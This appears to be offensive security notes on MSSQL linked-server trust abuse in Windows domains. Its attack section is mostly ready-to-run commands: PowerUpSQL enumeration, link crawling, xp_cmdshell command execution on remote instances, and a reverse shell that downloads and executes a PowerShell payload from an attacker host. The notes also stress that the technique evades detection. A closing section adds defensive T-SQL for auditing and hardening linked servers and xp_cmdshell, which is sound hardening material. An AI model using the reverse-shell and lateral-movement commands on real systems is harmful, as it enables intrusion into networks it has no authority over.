MSSQL Server Trust Abuse

Within Windows domains, MSSQL is widely deployed, often on dedicated servers that users from other hosts connect to. If a domain has a SQL Server, it provides an excellent opportunity for lateral movement, since domain users can be mapped to database roles.

What we can also take advantage of are database links (linked servers). SQL Servers within a network are often accessible to each other, and the links between the different databases give us a unique way to traverse the Active Directory network: we can indirectly execute commands on remote instances without leaving our current station. This works not only across domain trusts within a forest, but between separate forests as well.

These attacks can also go relatively undetected, because you can execute commands on distant SQL Servers from your own machine.

Enumeration

We can use PowerUpSQL.ps1 to enumerate SQL Servers.

Finding SQL Server Instances That Have an SPN Registered With the Domain Controller, and Discovering Logon Sessions

Get-SQLInstanceDomain

Finding Accessible SQL Servers

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Retrieve Basic Server Information and Database Links From Each Target Instance

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink -Instance <sql_server_domain> -Verbose

# Crawl database links downstream from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -Verbose

Now We Can Execute Commands

Check the results in the 'CustomQuery' column of the output.

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"

Get a Reverse Shell

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"
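As an added defender-side example (not part of the original notes or of PowerUpSQL), the T-SQL below audits the settings that make the link crawl and the xp_cmdshell commands above work: linked servers with RPC Out enabled, links that run under a fixed remote login rather than the caller's own credentials, and whether xp_cmdshell is enabled on the instance; the corrective statements follow. LINK_NAME_PLACEHOLDER is a placeholder for a link name returned by the first query.

```sql
-- Added audit/hardening example (not from the original notes). Run on each instance as a sysadmin.

-- 1. Inventory linked servers and the options that let a crawler hop through them.
--    is_rpc_out_enabled = 1 is what allows EXEC ... AT <link>, i.e. running stored
--    procedures such as xp_cmdshell on the remote instance over the link.
--    uses_self_credential = 0 together with a remote_name means every local login reaches
--    the remote server as that one fixed account, regardless of who the caller is.
SELECT s.name                                 AS link_name,
       s.data_source,
       s.provider,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       ISNULL(l.remote_name, '(no mapping)')  AS remote_login,
       l.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.is_rpc_out_enabled DESC, s.name;

-- 2. Check whether xp_cmdshell is enabled on this instance (value_in_use = 1 means enabled).
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 3. Hardening: turn RPC Out off on a link that does not need remote procedure calls
--    (LINK_NAME_PLACEHOLDER stands for a link_name from query 1) ...
EXEC sp_serveroption @server = N'LINK_NAME_PLACEHOLDER', @optname = N'rpc out', @optvalue = N'false';

-- ... and disable xp_cmdshell unless a documented job depends on it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Links whose fixed remote login is a sysadmin on the remote instance are the ones that turn a crawl into command execution, so repeat query 1 on every hop that the crawl output lists rather than only on the entry point.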
